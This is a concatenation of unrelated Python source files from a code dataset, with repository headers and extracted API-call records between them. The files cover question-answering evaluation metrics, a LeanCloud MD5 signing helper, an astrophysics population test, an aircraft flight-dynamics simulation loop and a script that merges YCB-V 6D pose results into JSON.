Collect ground truth answers. gt_mentions = {ex.qas_id: ex.answer_mention[0] for ex in dataset.examples} if supervision == "mention": gt_answer = gt_mentions else: gt_answer = {ex.qas_id: ex.answer_entity[0] for ex in dataset.examples} # Compute basic metrics. num_correct = 0. all_predictions = {} for result in results: qas_id = result["qas_ids"] prediction = result["predictions"] if prediction == gt_answer[qas_id]: num_correct += 1 all_predictions[qas_id] = name_map[str(prediction)] accuracy = num_correct / len(all_predictions) # Compute advanced metrics. 
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w")) micro, macro, _, _ = compute_scores(dataset.gt_file, output_prediction_file) # Return metrics. metrics = { "accuracy": accuracy, "micro-p": micro[0], "micro-r": micro[1], "micro-f": micro[2], "macro-p": macro[0], "macro-r": macro[1], "macro-f": macro[2], } return metrics def hotpot_eval_fn(dataset, results, name_map, output_prediction_file, **kwargs): """Compute evaluation metrics for HotpotQADataset. Args: dataset: An object of type HotpotQADataset. results: A list of result dicts from running estimator.predict. name_map: A mapping from prediction indices to text strings. output_prediction_file: File to store predictions to. **kwargs: Variable keyword arguments. Returns: metrics: A dict mapping metric names to values. """ del kwargs # Collect ground truth answers. gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples} gt_types = {ex.qas_id: ex.inference_chain for ex in dataset.examples} # Compute basic metrics. num_correct = {2: 0., 5: 0., 10: 0., 20: 0.} aps = [] no_answer = 0. all_predictions = {} bridge_acc, comp_acc = 0., 0. bridge_tot, comp_tot = 0, 0 single_acc = 0. layer_weights = np.zeros_like(results[0]["layer_probs"]) num_layer_entities = {i: 0. for i in range(layer_weights.shape[0])} num_new_entities = {i: 0. for i in range(layer_weights.shape[0])} for result in results: qas_id = result["qas_ids"].decode("utf-8") preds = result["top_idx"] scores = result["top_vals"] ans = gt_answer[qas_id] my_type = gt_types[qas_id] if my_type == "bridge": bridge_tot += 1 else: comp_tot += 1 ranks = np.where(np.in1d(preds, ans))[0] ranks = np.sort(ranks) ap = 0. cnt = 0. if any(rr < 10 for rr in ranks): single_acc += 1 if ranks.shape[0] == 0: no_answer += 1 for rr in ranks: cnt += 1 ap += cnt / (rr + 1) if ans: aps.append(ap / len(ans)) else: aps.append(0.) found = False for key in [2, 5, 10, 20]: if found or np.in1d(ans, preds[:key]).all(): num_correct[key] += 1 found = True if key == 10: if my_type == "bridge": bridge_acc += 1 else: comp_acc += 1 # Non-accuracy stats layer_weights += result["layer_probs"] layer_entities = {i: set() for i in range(layer_weights.shape[0])} all_predictions[qas_id] = {} for i in range(layer_weights.shape[0]): layer_entities[i] = set( [ee for ee in result["layer_%d_ent" % i] if ee != -1]) num_layer_entities[i] += len(layer_entities[i]) num_new_entities[i] += len(layer_entities[i] - layer_entities[0]) # all_predictions[qas_id]["layer_%d" % i] = [ # name_map[str(ee)] for ee in layer_entities[i]] all_predictions[qas_id]["predictions"] = [ (name_map[str(pred)], str(scores[i])) for i, pred in enumerate(preds) ] tf.logging.info("Evaluated %d items", len(all_predictions)) accuracy = { key: (num_correct[key] / len(all_predictions)) for key in num_correct } # Compute advanced metrics. json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w")) # Return metrics. 
metrics = {"eval/@%d" % key: accuracy[key] for key in accuracy} metrics["accuracy"] = accuracy[10] metrics["eval/map"] = sum(aps) / len(all_predictions) metrics["eval/bridge_accuracy"] = bridge_acc / bridge_tot metrics["eval/comparison_accuracy"] = comp_acc / comp_tot metrics["analysis/single_accuracy"] = single_acc / len(all_predictions) metrics["analysis/no_answers"] = no_answer / len(all_predictions) for i in range(layer_weights.shape[0]): metrics["analysis/layer_weight_%d" % i] = layer_weights[i] / len(all_predictions) metrics["analysis/num_entities_%d" % i] = num_layer_entities[i] / len(all_predictions) metrics["analysis/num_new_entities_%d" % i] = num_new_entities[i] / len(all_predictions) return metrics def normalize_answer(s): """Lower text and remove punctuation, articles and extra whitespace.""" def remove_articles(text): return re.sub(r"\b(a|an|the)\b", " ", text) def white_space_fix(text): return " ".join(text.split()) def remove_punc(text): exclude = set(string.punctuation) return "".join(ch for ch in text if ch not in exclude) def lower(text): return text.lower() return white_space_fix(remove_articles(remove_punc(lower(s)))) def f1_score(prediction, ground_truth): """Compute F1 score.""" prediction_tokens = normalize_answer(prediction).split() ground_truth_tokens = normalize_answer(ground_truth).split() common = collections.Counter(prediction_tokens) & collections.Counter( ground_truth_tokens) num_same = sum(common.values()) if num_same == 0: return 0 precision = 1.0 * num_same / len(prediction_tokens) recall = 1.0 * num_same / len(ground_truth_tokens) f1 = (2 * precision * recall) / (precision + recall) return f1 def exact_match_score(prediction, ground_truth): """Compute EM score.""" return normalize_answer(prediction) == normalize_answer(ground_truth) def metric_max_over_ground_truths(metric_fn, prediction, ground_truths): scores_for_ground_truths = [] for ground_truth in ground_truths: my_score = metric_fn(prediction, ground_truth) scores_for_ground_truths.append(my_score) return max(scores_for_ground_truths) def read_predictions(prediction_file): with tf.gfile.Open(prediction_file) as f: predictions = json.load(f) return predictions def read_answers(gold_file): """Read ground truth answers.""" answers = {} f = tf.gfile.Open(gold_file) if gold_file.endswith(".gz"): f = gzip.GzipFile(fileobj=f) for i, line in enumerate(f): example = json.loads(line) if i == 0 and "header" in example: continue for qa in example["qas"]: answers[qa["qid"]] = qa["answers"] f.close() return answers def evaluate(answers, predictions, skip_no_answer=False): """Compute F1 and EM scores.""" f1 = exact_match = total = 0 for qid, ground_truths in answers.items(): if qid not in predictions: if not skip_no_answer: message = "Unanswered question %s will receive score 0." 
% qid print(message) total += 1 continue total += 1 prediction = predictions[qid] exact_match += metric_max_over_ground_truths(exact_match_score, prediction, ground_truths) f1 += metric_max_over_ground_truths(f1_score, prediction, ground_truths) exact_match = 100.0 * exact_match / total f1 = 100.0 * f1 / total return {"exact_match": exact_match, "f1": f1} def mrqa_eval_fn(dataset_file, predictions_file, skip_no_answer=True): answers = read_answers(dataset_file) predictions = read_predictions(predictions_file) return evaluate(answers, predictions, skip_no_answer) def compute_scores(ground_truth_file, predicted_answers_file): """Read predictions and ground truth and return P, R, F.""" telemetry, incorrect = read_results(ground_truth_file, predicted_answers_file) micro = aprf(telemetry) relationwise = aprf_relationwise(telemetry) macro = sum([val[0] for _, val in relationwise.items()]) macro = macro / len(relationwise) return micro, macro, relationwise, incorrect def read_results(ground_truth_file, predicted_answers_file): """Read results and ground truth and return data structure with stats.""" with codecs.getreader("utf-8")(tf.gfile.GFile(ground_truth_file, "r")) as read: data_ = {} for line in read: item = json.loads(line.strip()) if isinstance(item["relation"], dict): relation = item["relation"]["wikidata_id"] elif isinstance(item["relation"], list): relation = ( item["relation"][0]["wikidata_id"] + "_" + item["relation"][1]["wikidata_id"]) data_[item["id"]] = [relation, item["subject"]["wikidata_id"]] if "is_impossible" in item and item["is_impossible"]: continue if item["object"] is None: continue if isinstance(item["object"]["mention"], dict): data_[item["id"]] += [item["object"]["mention"]["text"]] if "name" in item["object"]: data_[item["id"]] += [item["object"]["name"]] if "aliases" in item["object"]: data_[item["id"]] += item["object"]["aliases"].keys() with codecs.getreader("utf-8")(tf.gfile.GFile(predicted_answers_file, "r")) as fin: predictions = json.load(fin) telemetry, incorrect = [], [] n = 0 for key in data_: if key not in predictions: continue g = data_[key][2:] a = predictions[key] m = data_[key][:2] stats = score(g, a) telemetry.append([m[0], m[1], g, a, stats]) if stats[0] == 0. and stats[3] > 0.: incorrect.append(key) n += 1 return telemetry, incorrect def aprf_relationwise(g): """Returns precision, recall and F score for each relation.""" rel_to_stats = collections.defaultdict(list) for item in g: rel_to_stats[item[0]].append(item) rel_to_scores = {} for rel, stats in rel_to_stats.items(): rel_to_scores[rel] = [aprf(stats), len(stats)] return rel_to_scores def aprf(g): """Returns precision, recall and F of the given statistics.""" tp, _, sys_pos, real_pos = sum([x[-1] for x in g]) if tp == 0: p = r = f = 0.0 else: p = tp / float(sys_pos) if sys_pos > 0 else 0. r = tp / float(real_pos) if real_pos > 0 else 0. 
f = 2 * p * r / (p + r) return np.asarray([p, r, f]) def score(gold, answer): """Compares answer to ground truth to return TP / FP stats.""" if gold: gold = set([simplify(g) for g in gold]) answer = simplify(answer) result = np.zeros(4) if gold: result[3] += 1 if answer in gold: result[0] += 1 else: if not answer: result[1] += 1 if answer: result[2] += 1 return result def strip_accents_and_punct(text): """Strips accents from a piece of text.""" text = unicodedata.normalize("NFD", text) output = [] for char in text: if char in PUNCTUATION: continue cat = unicodedata.category(char) if cat == "Mn": continue output.append(char) return "".join(output) def simplify(answer): """Pre-process answer string.""" toks = [] articles = {"the", "a", "an", "and", ""} for t in answer.strip().lower().split(): tok = strip_accents_and_punct(t) if tok not in articles: toks.append(tok) return "".join(toks) def rare_relation_scores(relationwise, relation2counts): """Print statistics of rare relations for different thresholds.""" for thresh in [5, 100, 500, 1000]: freq_stats, freq_total = np.array([0., 0., 0.]), 0 rare_stats, rare_total = np.array([0., 0., 0.]), 0 for relation, (stats, _) in relationwise.items(): if relation2counts.get(relation, 0) < thresh: rare_stats += stats rare_total += 1 else: freq_stats += stats freq_total += 1 rare_stats /= rare_total freq_stats /= freq_total print( "Threshold =", thresh, "rare", rare_total, "Micro-P %.3f Micro-R %.3f Micro-F %.3f" % (rare_stats[0], rare_stats[1], rare_stats[2]), "freq", freq_total, "Micro-P %.3f Micro-R %.3f Micro-F %.3f" % (freq_stats[0], freq_stats[1], freq_stats[2])) def main(_): eval_type = "hotpot" if eval_type == "hotpot": test_hotpot_eval() else: micro, macro, rwise, _ = compute_scores(FLAGS.ground_truth_file, FLAGS.predicted_answers_file) print("Micro", micro) print("Macro", macro) if FLAGS.relation_counts_file is not None: r2c = json.load(tf.gfile.Open(FLAGS.relation_counts_file)) rare_relation_scores(rwise, r2c) if __name__ == "__main__": app.run(main)
[((1051, 1136), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""ground_truth_file"""', 'None', '"""File with ground truth answers."""'], {}), "('ground_truth_file', None,\n 'File with ground truth answers.')\n", (1070, 1136), False, 'from absl import flags\n'), ((1154, 1252), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""predicted_answers_file"""', 'None', '"""File with predicted answers from model."""'], {}), "('predicted_answers_file', None,\n 'File with predicted answers from model.')\n", (1173, 1252), False, 'from absl import flags\n'), ((1270, 1358), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""relation_counts_file"""', 'None', '"""JSON file with relation counts."""'], {}), "('relation_counts_file', None,\n 'JSON file with relation counts.')\n", (1289, 1358), False, 'from absl import flags\n'), ((8405, 8445), 'numpy.zeros_like', 'np.zeros_like', (["results[0]['layer_probs']"], {}), "(results[0]['layer_probs'])\n", (8418, 8445), True, 'import numpy as np\n'), ((12886, 12910), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['gold_file'], {}), '(gold_file)\n', (12899, 12910), True, 'import tensorflow.compat.v1 as tf\n'), ((16361, 16390), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (16384, 16390), False, 'import collections\n'), ((16900, 16921), 'numpy.asarray', 'np.asarray', (['[p, r, f]'], {}), '([p, r, f])\n', (16910, 16921), True, 'import numpy as np\n'), ((17108, 17119), 'numpy.zeros', 'np.zeros', (['(4)'], {}), '(4)\n', (17116, 17119), True, 'import numpy as np\n'), ((17381, 17415), 'unicodedata.normalize', 'unicodedata.normalize', (['"""NFD"""', 'text'], {}), "('NFD', text)\n", (17402, 17415), False, 'import unicodedata\n'), ((19207, 19220), 'absl.app.run', 'app.run', (['main'], {}), '(main)\n', (19214, 19220), False, 'from absl import app\n'), ((1865, 1900), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'obj'], {}), '(self, obj)\n', (1889, 1900), False, 'import json\n'), ((5227, 5269), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['output_prediction_file', '"""w"""'], {}), "(output_prediction_file, 'w')\n", (5240, 5269), True, 'import tensorflow.compat.v1 as tf\n'), ((5290, 5327), 'random.sample', 'random.sample', (['incorrect_results', '(100)'], {}), '(incorrect_results, 100)\n', (5303, 5327), False, 'import random\n'), ((5335, 5392), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (["(output_prediction_file + '.incorrect')", '"""w"""'], {}), "(output_prediction_file + '.incorrect', 'w')\n", (5348, 5392), True, 'import tensorflow.compat.v1 as tf\n'), ((5437, 5472), 'random.sample', 'random.sample', (['correct_results', '(100)'], {}), '(correct_results, 100)\n', (5450, 5472), False, 'import random\n'), ((5480, 5535), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (["(output_prediction_file + '.correct')", '"""w"""'], {}), "(output_prediction_file + '.correct', 'w')\n", (5493, 5535), True, 'import tensorflow.compat.v1 as tf\n'), ((7105, 7147), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['output_prediction_file', '"""w"""'], {}), "(output_prediction_file, 'w')\n", (7118, 7147), True, 'import tensorflow.compat.v1 as tf\n'), ((8914, 8928), 'numpy.sort', 'np.sort', (['ranks'], {}), '(ranks)\n', (8921, 8928), True, 'import numpy as np\n'), ((10374, 10416), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['output_prediction_file', '"""w"""'], {}), "(output_prediction_file, 'w')\n", (10387, 10416), True, 'import tensorflow.compat.v1 as tf\n'), ((11368, 11405), 
're.sub', 're.sub', (['"""\\\\b(a|an|the)\\\\b"""', '""" """', 'text'], {}), "('\\\\b(a|an|the)\\\\b', ' ', text)\n", (11374, 11405), False, 'import re\n'), ((11903, 11941), 'collections.Counter', 'collections.Counter', (['prediction_tokens'], {}), '(prediction_tokens)\n', (11922, 11941), False, 'import collections\n'), ((11944, 11984), 'collections.Counter', 'collections.Counter', (['ground_truth_tokens'], {}), '(ground_truth_tokens)\n', (11963, 11984), False, 'import collections\n'), ((12710, 12740), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['prediction_file'], {}), '(prediction_file)\n', (12723, 12740), True, 'import tensorflow.compat.v1 as tf\n'), ((12765, 12777), 'json.load', 'json.load', (['f'], {}), '(f)\n', (12774, 12777), False, 'import json\n'), ((12951, 12975), 'gzip.GzipFile', 'gzip.GzipFile', ([], {'fileobj': 'f'}), '(fileobj=f)\n', (12964, 12975), False, 'import gzip\n'), ((13021, 13037), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (13031, 13037), False, 'import json\n'), ((15848, 15862), 'json.load', 'json.load', (['fin'], {}), '(fin)\n', (15857, 15862), False, 'import json\n'), ((17503, 17529), 'unicodedata.category', 'unicodedata.category', (['char'], {}), '(char)\n', (17523, 17529), False, 'import unicodedata\n'), ((14727, 14752), 'codecs.getreader', 'codecs.getreader', (['"""utf-8"""'], {}), "('utf-8')\n", (14743, 14752), False, 'import codecs\n'), ((14753, 14791), 'tensorflow.compat.v1.gfile.GFile', 'tf.gfile.GFile', (['ground_truth_file', '"""r"""'], {}), "(ground_truth_file, 'r')\n", (14767, 14791), True, 'import tensorflow.compat.v1 as tf\n'), ((15703, 15728), 'codecs.getreader', 'codecs.getreader', (['"""utf-8"""'], {}), "('utf-8')\n", (15719, 15728), False, 'import codecs\n'), ((15729, 15772), 'tensorflow.compat.v1.gfile.GFile', 'tf.gfile.GFile', (['predicted_answers_file', '"""r"""'], {}), "(predicted_answers_file, 'r')\n", (15743, 15772), True, 'import tensorflow.compat.v1 as tf\n'), ((18076, 18101), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (18084, 18101), True, 'import numpy as np\n'), ((18131, 18156), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (18139, 18156), True, 'import numpy as np\n'), ((8878, 8897), 'numpy.in1d', 'np.in1d', (['preds', 'ans'], {}), '(preds, ans)\n', (8885, 8897), True, 'import numpy as np\n'), ((19094, 19135), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['FLAGS.relation_counts_file'], {}), '(FLAGS.relation_counts_file)\n', (19107, 19135), True, 'import tensorflow.compat.v1 as tf\n'), ((9267, 9292), 'numpy.in1d', 'np.in1d', (['ans', 'preds[:key]'], {}), '(ans, preds[:key])\n', (9274, 9292), True, 'import numpy as np\n')]
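The f1_score() and normalize_answer() helpers in evaluate.py above are easiest to follow with a concrete input. The snippet below is a self-contained re-implementation (an illustrative sketch, not code from the repository) that keeps the same normalization order -- lowercase, strip punctuation, drop articles, collapse whitespace -- and walks one prediction/ground-truth pair through it.

import collections
import re
import string

def normalize(s):
    s = s.lower()
    s = "".join(ch for ch in s if ch not in set(string.punctuation))
    s = re.sub(r"\b(a|an|the)\b", " ", s)
    return " ".join(s.split())

def f1(prediction, ground_truth):
    p_toks = normalize(prediction).split()
    g_toks = normalize(ground_truth).split()
    common = collections.Counter(p_toks) & collections.Counter(g_toks)
    num_same = sum(common.values())
    if num_same == 0:
        return 0.0
    precision = num_same / len(p_toks)
    recall = num_same / len(g_toks)
    return 2 * precision * recall / (precision + recall)

# 2 shared tokens, 2 predicted tokens, 3 ground-truth tokens -> F1 ~ 0.8
print(f1("the Eiffel Tower", "Eiffel Tower, Paris"))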
jlashner/ares
tests/adv/test_pop_sfrd.py
6df2b676ded6bd59082a531641cb1dadd475c8a8
""" test_pop_models.py Author: Jordan Mirocha Affiliation: UCLA Created on: Fri Jul 15 15:23:11 PDT 2016 Description: """ import ares import matplotlib.pyplot as pl PB = ares.util.ParameterBundle def test(): # Create a simple population pars_1 = PB('pop:fcoll') + PB('sed:bpass') pop_fcoll = ares.populations.GalaxyPopulation(**pars_1) #pop_fcoll_XR = ares.populations.GalaxyPopulation(**pars_1) # Mimic the above population to check our different SFRD/SED techniques sfrd_pars = {'pop_sfr_model': 'sfrd-func'} sfrd_pars['pop_sfrd'] = pop_fcoll.SFRD sfrd_pars['pop_sfrd_units'] = 'internal' sed = PB('sed:toy') sed['pop_Nion'] = pop_fcoll.src.Nion sed['pop_Nlw'] = pop_fcoll.src.Nlw # pop_Ex? sed['pop_ion_src_igm'] = False sed['pop_heat_src_igm'] = False pars_2 = sed + sfrd_pars pop_sfrd = ares.populations.GalaxyPopulation(**pars_2) assert pop_fcoll.SFRD(20.) == pop_sfrd.SFRD(20.), "Error in SFRD." # Check the emissivities too #print(pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6)) #print(pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6)) #assert pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6) \ # == pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6), \ # "Error in photon luminosity density." if __name__ == '__main__': test()
[((313, 356), 'ares.populations.GalaxyPopulation', 'ares.populations.GalaxyPopulation', ([], {}), '(**pars_1)\n', (346, 356), False, 'import ares\n'), ((885, 928), 'ares.populations.GalaxyPopulation', 'ares.populations.GalaxyPopulation', ([], {}), '(**pars_2)\n', (918, 928), False, 'import ares\n')]
corgiclub/CorgiBot_telegram
venv/lib/python3.7/site-packages/leancloud/engine/utils.py
a63d91a74ee497b9a405e93bd3b303367ef95268
# coding: utf-8 import time import hashlib import leancloud from leancloud._compat import to_bytes __author__ = 'asaka <[email protected]>' def sign_by_key(timestamp, key): return hashlib.md5(to_bytes('{0}{1}'.format(timestamp, key))).hexdigest()
[]
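sign_by_key() above is a one-liner, so a short usage sketch makes the contract explicit: the signature is simply the hex MD5 digest of the timestamp concatenated with the key (assuming to_bytes() performs a UTF-8 encode). The key below is a made-up placeholder.

import hashlib
import time

key = "my-master-key"                      # hypothetical application key
timestamp = int(time.time() * 1000)
digest = hashlib.md5("{0}{1}".format(timestamp, key).encode("utf-8")).hexdigest()
print(digest)  # the value sign_by_key(timestamp, key) should return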
eyler94/ee674AirplaneSim
AirplaneLQR/chap4LQR/mavsim_chap4.py
3ba2c6e685c2688a7f372475a7cd1f55f583d10e
""" mavsimPy - Chapter 4 assignment for Beard & McLain, PUP, 2012 - Update history: 12/27/2018 - RWB 1/17/2019 - RWB """ import sys sys.path.append('..') import numpy as np import parameters.simulation_parameters as SIM from chap2.mav_viewer import mav_viewer # from chap2.video_writer import video_writer from chap3.data_viewer import data_viewer from chap4.mav_dynamics import mav_dynamics from chap4.wind_simulation import wind_simulation from time import sleep # initialize the visualization VIDEO = False # True==write video, False==don't write video mav_view = mav_viewer() # initialize the mav viewer data_view = data_viewer() # initialize view of data plots if VIDEO == True: video = video_writer(video_name="chap4_video.avi", bounding_box=(0, 0, 1000, 1000), output_rate=SIM.ts_video) # initialize elements of the architecture wind = wind_simulation(SIM.ts_simulation) mav = mav_dynamics(SIM.ts_simulation) # initialize the simulation time sim_time = SIM.start_time # main simulation loop # sleep(5) print("Press Command-Q to exit...") while sim_time < SIM.end_time: #-------set control surfaces------------- if(sim_time<25): delta_e = -0.1 delta_t = 1.0 # 0.5 delta_a = 0.0 # 0.0 delta_r = 0.0 # 0.005 delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector else: delta_e = -0.3 delta_t = 1.0#0.5 delta_a = 0.01#0.0 delta_r = 0.00025#0.005 delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector #-------physical system------------- current_wind = wind.update() # get the new wind vector # print("current wind: ", current_wind) mav.update_state(delta, current_wind) # propagate the MAV dynamics #-------update viewer------------- mav_view.update(mav.msg_true_state) # plot body of MAV data_view.update(mav.msg_true_state, # true states mav.msg_true_state, # estimated states mav.msg_true_state, # commanded states SIM.ts_simulation) if VIDEO == True: video.update(sim_time) #-------increment time------------- sim_time += SIM.ts_simulation if VIDEO == True: video.close()
[((158, 179), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (173, 179), False, 'import sys\n'), ((596, 608), 'chap2.mav_viewer.mav_viewer', 'mav_viewer', ([], {}), '()\n', (606, 608), False, 'from chap2.mav_viewer import mav_viewer\n'), ((650, 663), 'chap3.data_viewer.data_viewer', 'data_viewer', ([], {}), '()\n', (661, 663), False, 'from chap3.data_viewer import data_viewer\n'), ((929, 963), 'chap4.wind_simulation.wind_simulation', 'wind_simulation', (['SIM.ts_simulation'], {}), '(SIM.ts_simulation)\n', (944, 963), False, 'from chap4.wind_simulation import wind_simulation\n'), ((970, 1001), 'chap4.mav_dynamics.mav_dynamics', 'mav_dynamics', (['SIM.ts_simulation'], {}), '(SIM.ts_simulation)\n', (982, 1001), False, 'from chap4.mav_dynamics import mav_dynamics\n'), ((1359, 1407), 'numpy.array', 'np.array', (['[[delta_e, delta_t, delta_a, delta_r]]'], {}), '([[delta_e, delta_t, delta_a, delta_r]])\n', (1367, 1407), True, 'import numpy as np\n'), ((1584, 1632), 'numpy.array', 'np.array', (['[[delta_e, delta_t, delta_a, delta_r]]'], {}), '([[delta_e, delta_t, delta_a, delta_r]])\n', (1592, 1632), True, 'import numpy as np\n')]
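One detail in the simulation loop above that is easy to miss is the shape of the control vector: np.array([[delta_e, delta_t, delta_a, delta_r]]) is a 1x4 row vector and the trailing .T turns it into the 4x1 column vector the dynamics expect. A tiny standalone check:

import numpy as np

delta = np.array([[-0.1, 1.0, 0.0, 0.0]]).T
print(delta.shape)  # (4, 1) -- a column vector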
THU-DA-6D-Pose-Group/self6dpp
core/self6dpp/tools/ycbv/ycbv_pbr_so_mlBCE_Double_3_merge_train_real_uw_init_results_with_refined_poses_to_json.py
c267cfa55e440e212136a5e9940598720fa21d16
import os.path as osp import sys import numpy as np import mmcv from tqdm import tqdm from functools import cmp_to_key cur_dir = osp.dirname(osp.abspath(__file__)) PROJ_ROOT = osp.normpath(osp.join(cur_dir, "../../../../")) sys.path.insert(0, PROJ_ROOT) from lib.pysixd import inout, misc from lib.utils.bbox_utils import xyxy_to_xywh from lib.utils.utils import iprint, wprint id2obj = { 1: "002_master_chef_can", # [1.3360, -0.5000, 3.5105] 2: "003_cracker_box", # [0.5575, 1.7005, 4.8050] 3: "004_sugar_box", # [-0.9520, 1.4670, 4.3645] 4: "005_tomato_soup_can", # [-0.0240, -1.5270, 8.4035] 5: "006_mustard_bottle", # [1.2995, 2.4870, -11.8290] 6: "007_tuna_fish_can", # [-0.1565, 0.1150, 4.2625] 7: "008_pudding_box", # [1.1645, -4.2015, 3.1190] 8: "009_gelatin_box", # [1.4460, -0.5915, 3.6085] 9: "010_potted_meat_can", # [2.4195, 0.3075, 8.0715] 10: "011_banana", # [-18.6730, 12.1915, -1.4635] 11: "019_pitcher_base", # [5.3370, 5.8855, 25.6115] 12: "021_bleach_cleanser", # [4.9290, -2.4800, -13.2920] 13: "024_bowl", # [-0.2270, 0.7950, -2.9675] 14: "025_mug", # [-8.4675, -0.6995, -1.6145] 15: "035_power_drill", # [9.0710, 20.9360, -2.1190] 16: "036_wood_block", # [1.4265, -2.5305, 17.1890] 17: "037_scissors", # [7.0535, -28.1320, 0.0420] 18: "040_large_marker", # [0.0460, -2.1040, 0.3500] 19: "051_large_clamp", # [10.5180, -1.9640, -0.4745] 20: "052_extra_large_clamp", # [-0.3950, -10.4130, 0.1620] 21: "061_foam_brick", # [-0.0805, 0.0805, -8.2435] } obj_num = len(id2obj) obj2id = {_name: _id for _id, _name in id2obj.items()} if __name__ == "__main__": new_res_path = osp.join( PROJ_ROOT, "datasets/BOP_DATASETS/ycbv/test/init_poses/", "resnest50d_online_AugCosyAAEGray_mlBCE_DoubleMask_ycbv_pbr_100e_so_GdrnPbrPose_withYolov4PbrBbox_wDeepimPbrPose_ycbv_train_real_uw.json", ) if osp.exists(new_res_path): wprint("{} already exists! 
overriding!".format(new_res_path)) res_root = "output/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/" iter_num_test = 4 pkl_paths = [ "01_02MasterChefCan/inference_model_final_wo_optim-2de2b4e3/ycbv_002_master_chef_can_train_real_uw/results.pkl", "02_03CrackerBox/inference_model_final_wo_optim-41082f8a/ycbv_003_cracker_box_train_real_uw/results.pkl", "03_04SugarBox/inference_model_final_wo_optim-e09dec3e/ycbv_004_sugar_box_train_real_uw/results.pkl", "04_05TomatoSoupCan/inference_model_final_wo_optim-5641f5d3/ycbv_005_tomato_soup_can_train_real_uw/results.pkl", "05_06MustardBottle/inference_model_final_wo_optim-6ce23e94/ycbv_006_mustard_bottle_train_real_uw/results.pkl", "06_07TunaFishCan/inference_model_final_wo_optim-0a768962/ycbv_007_tuna_fish_can_train_real_uw/results.pkl", "07_08PuddingBox/inference_model_final_wo_optim-f2f2cf73/ycbv_008_pudding_box_train_real_uw/results.pkl", "08_09GelatinBox/inference_model_final_wo_optim-a303aa1e/ycbv_009_gelatin_box_train_real_uw/results.pkl", "09_10PottedMeatCan/inference_model_final_wo_optim-84a56ffd/ycbv_010_potted_meat_can_train_real_uw/results.pkl", "10_11Banana/inference_model_final_wo_optim-83947126/ycbv_011_banana_train_real_uw/results.pkl", "11_19PitcherBase/inference_model_final_wo_optim-af1c7e62/ycbv_019_pitcher_base_train_real_uw/results.pkl", "12_21BleachCleanser/inference_model_final_wo_optim-5d740a46/ycbv_021_bleach_cleanser_train_real_uw/results.pkl", "13_24Bowl/inference_model_final_wo_optim-f11815d3/ycbv_024_bowl_train_real_uw/results.pkl", "14_25Mug/inference_model_final_wo_optim-e4824065/ycbv_025_mug_train_real_uw/results.pkl", "15_35PowerDrill/inference_model_final_wo_optim-30d7d1da/ycbv_035_power_drill_train_real_uw/results.pkl", "16_36WoodBlock/inference_model_final_wo_optim-fbb38751/ycbv_036_wood_block_train_real_uw/results.pkl", "17_37Scissors/inference_model_final_wo_optim-5068c6bb/ycbv_037_scissors_train_real_uw/results.pkl", "18_40LargeMarker/inference_model_final_wo_optim-e8d5867c/ycbv_040_large_marker_train_real_uw/results.pkl", "19_51LargeClamp/inference_model_final_wo_optim-1ea79b34/ycbv_051_large_clamp_train_real_uw/results.pkl", "20_52ExtraLargeClamp/inference_model_final_wo_optim-cb595297/ycbv_052_extra_large_clamp_train_real_uw/results.pkl", "21_61FoamBrick/inference_model_final_wo_optim-d3757ca1/ycbv_061_foam_brick_train_real_uw/results.pkl", ] obj_names = [obj for obj in obj2id] new_res_dict = {} for obj_name, pred_name in zip(obj_names, pkl_paths): assert obj_name in pred_name, "{} not in {}".format(obj_name, pred_name) pred_path = osp.join(res_root, pred_name) assert osp.exists(pred_path), pred_path iprint(obj_name, pred_path) # pkl scene_im_id key, list of preds preds = mmcv.load(pred_path) for scene_im_id, pred_list in preds.items(): for pred in pred_list: obj_id = pred["obj_id"] score = pred["score"] bbox_est = pred["bbox_det_xyxy"] # xyxy bbox_est_xywh = xyxy_to_xywh(bbox_est) refined_pose = pred["pose_{}".format(iter_num_test)] pose_est = pred["pose_0"] cur_new_res = { "obj_id": obj_id, "score": float(score), "bbox_est": bbox_est_xywh.tolist(), "pose_est": pose_est.tolist(), "pose_refine": refined_pose.tolist(), } if scene_im_id not in new_res_dict: new_res_dict[scene_im_id] = [] new_res_dict[scene_im_id].append(cur_new_res) inout.save_json(new_res_path, new_res_dict) iprint() iprint("new result path: {}".format(new_res_path))
